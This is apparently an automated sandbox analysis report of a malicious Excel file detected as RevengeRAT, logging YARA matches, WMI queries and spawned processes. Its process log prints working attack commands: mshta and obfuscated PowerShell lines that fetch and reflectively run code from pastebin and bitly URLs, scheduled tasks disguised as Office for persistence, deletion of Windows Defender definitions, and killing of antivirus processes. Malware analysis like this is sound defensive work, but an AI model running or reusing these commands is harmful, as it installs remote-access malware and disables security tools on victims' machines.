Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Yara signature match

Show sources

Source: 0000000C.00000002.1807343124.04440000.00000004.sdmp, type: MEMORY	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.powershell.exe.4440000.6.raw.unpack, type: UNPACKEDPE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.powershell.exe.4440000.6.unpack, type: UNPACKEDPE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/

Classification label

Show sources

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@90/16@12/4

Creates files inside the user directory

Show sources

Source: C:\Windows\System32\mshta.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\432XC5PE.txt

Jump to behavior

Creates temporary files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user~1\AppData\Local\Temp\CVR3528.tmp

Jump to behavior

Document contains an OLE Workbook stream indicating a Microsoft Excel file

Show sources

Source: Mcg4yE0diN.xls

OLE indicator, Workbook stream: true

Found command line output

Show sources

Source: C:\Windows\System32\schtasks.exe	Console Write: ........a.Xw..0.................QM..........................`.....+.\.-.P.-.....8...............L............5 .....G..w	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Console Write: ........a.Xw..0.........<.......4P..........................`.....J.4.L.(.L...................................=.....G..w	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: .........3.k........P.S. .C.:.\.U.s.e.r.s.\.l.u.k.e.t.a.y.l.o.r.\.D.o.c.u.m.e.n.t.s.>. ...).`(..........D...$(.k...k....	Jump to behavior
Source: C:\Windows\System32\forfiles.exe	Console Write: ........a.Xw..0.........0........Q......................................................................................
Source: C:\Windows\System32\taskkill.exe	Console Write: ..#.....a.Xw..0.............8....R..........................(.%.........D.;.d.........;.n...D.;.B.....#.X...............
Source: C:\Windows\System32\taskkill.exe	Console Write: .. .....a.Xw..0.........0........R..................................P.....!.d.......M.!.n.....!.B..... .X...............
Source: C:\Windows\System32\taskkill.exe	Console Write: .. .....a.Xw..0.........0........T..................................D...D.D.d.........D.n...D.D.B..... .X...............
Source: C:\Windows\System32\taskkill.exe	Console Write: ..#.....a.Xw..0..................S..............................p...4. ........... .....4. .B...E..w..#.....D..........w
Source: C:\Windows\System32\taskkill.exe	Console Write: ..#.....a.Xw..0.............8...CU.......................... ...........D.J.b.........J.n...D.J.B.....#.T...........4...
Source: C:\Windows\System32\taskkill.exe	Console Write: .. .....a.Xw..0.........0.......vU............................+.........D.J.d.........J.n...D.J.B..... .X...........h...
Source: C:\Windows\System32\taskkill.exe	Console Write: .. .....a.Xw..0.........0........V............................*.........D.a.d.........a.n...D.a.B..... .X...............
Source: C:\Windows\System32\taskkill.exe	Console Write: ..#.....a.Xw..0..................V..........................8.0.........D.b.e.........b.n...D.b.B.....#.Z...........L...
Source: C:\Windows\System32\forfiles.exe	Console Write: ........a.Xw..0.............8....X....................................................................%.................
Source: C:\Windows\System32\taskkill.exe	Console Write: .. .....a.Xw..0.........0........W............................4....... .D. .d......... .n...D. .B..... .X...........<. .
Source: C:\Windows\System32\taskkill.exe	Console Write: .. .....a.Xw..0.........0........X..................................p...D.Z.d.........Z.n...D.Z.B..... .X...............
Source: C:\Windows\System32\taskkill.exe	Console Write: ..$.....a.Xw..0..................X..........................@.............L.e.......O.L.n.....L.B.....$.Z...........t...
Source: C:\Windows\System32\taskkill.exe	Console Write: .. .....a.Xw..0.........0.......KZ............................=....... .D.m.d.........m.n...D.m.B..... .X............. .
Source: C:\Windows\System32\taskkill.exe	Console Write: ..$.....a.Xw..0..................Z..........................@.#.....T...D.P.e.........P.n...D.P.B.....$.Z...............
Source: C:\Windows\System32\taskkill.exe	Console Write: ..$.....a.Xw..0..................[..........................@...........D.K.e.........K.n...D.K.B.....$.Z...........\|...
Source: C:\Windows\System32\taskkill.exe	Console Write: .. .....a.Xw..0.........0........[............................A.......%.D.O.d.........O.n...D.O.B..... .X.............%.
Source: C:\Windows\System32\taskkill.exe	Console Write: .. .....a.Xw..0.........0........]............................*.........D.I.d.........I.n...D.I.B..... .X...............
Source: C:\Windows\System32\taskkill.exe	Console Write: ..$.....a.Xw..0.................0]..........................@...........D.c.e.........c.n...D.c.B.....$.Z...........\...
Source: C:\Windows\System32\taskkill.exe	Console Write: ..$.....a.Xw..0............. ....^..........................@.#.........D.O.e.........O.n...D.O.B.....$.Z...............
Source: C:\Windows\System32\taskkill.exe	Console Write: .. .....a.Xw..0.........0...8....^............................9.....(.....X.d.......M.X.n.....X.B..... .X...............

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\schtasks.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - select * from Win32_Processor
Source: C:\Windows\System32\mshta.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\forfiles.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\forfiles.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\forfiles.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MpCmdRun.exe")
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "winword.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MpCmdRun.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\mshta.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\mshta.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "excel.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MpCmdRun.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSPUB.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "POWERPNT.EXE")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\forfiles.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\forfiles.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\forfiles.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSASCuiL.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSASCuiL.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSASCuiL.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSASCuiL.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSASCuiL.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSASCuiL.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSASCuiL.exe")
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "AvastUi.exe")

Reads ini files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\mshta.exe mshta.exe http://www.bitly.com/SexoPhone2
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 100 /tn 'MicrofoftOffice19' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/UwmtjtG9\',0,true)(window.close)' /F
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c powershell -Noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 'ttp' + 's:/' + '/pastebin' + '.' + 'com/raw/J4rMxGNR'))).EnTrYPoInT.InVoKe($N,$N)
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & forfiles /c 'taskkill /f /im AvastUi.exe' & exit
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c cd 'C:\Program Files\Windows Defender' & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c 'taskkill /f /im MSASCuiL.exe' & forfiles /c 'taskkill /f /im MpCmdRun.exe' & exit
Source: unknown	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'Ms-New' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/w3Y29LYH\',0,true)(window.close)' /F
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {DEF81FE9-E535-4A37-A1ED-09F34CC17167} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[2]
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('h' + 'ttp' + 's:/' + '/pastebin' + '.' + 'com/raw/J4rMxGNR'))).EnTrYPoInT.InVoKe($N,$N)
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:CreateObject('Wscript.Shell').Run('mshta.exe https://pastebin.com/raw/UwmtjtG9',0,true)(window.close)
Source: unknown	Process created: C:\Windows\System32\forfiles.exe forfiles /c 'taskkill /f /im AvastUi.exe'
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe MpCmdRun.exe -removedefinitions -dynamicsignatures
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im winword.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE vbscript:CreateObject('Wscript.Shell').Run('mshta.exe https://pastebin.com/raw/w3Y29LYH',0,true)(window.close)
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im excel.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im MSPUB.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe taskkill /f /im POWERPNT.EXE
Source: unknown	Process created: C:\Windows\System32\forfiles.exe forfiles /c 'taskkill /f /im MSASCuiL.exe'
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im MSASCuiL.exe
Source: unknown	Process created: C:\Windows\System32\taskkill.exe /f /im AvastUi.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\mshta.exe mshta.exe http://www.bitly.com/SexoPhone2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 100 /tn 'MicrofoftOffice19' /tr 'mshta vbscript:CreateObject(\'Wscript.Shell\').Run(\'mshta.exe https://pastebin.com/raw/UwmtjtG9\',0,true)(window.close)' /F	Jump to behavior
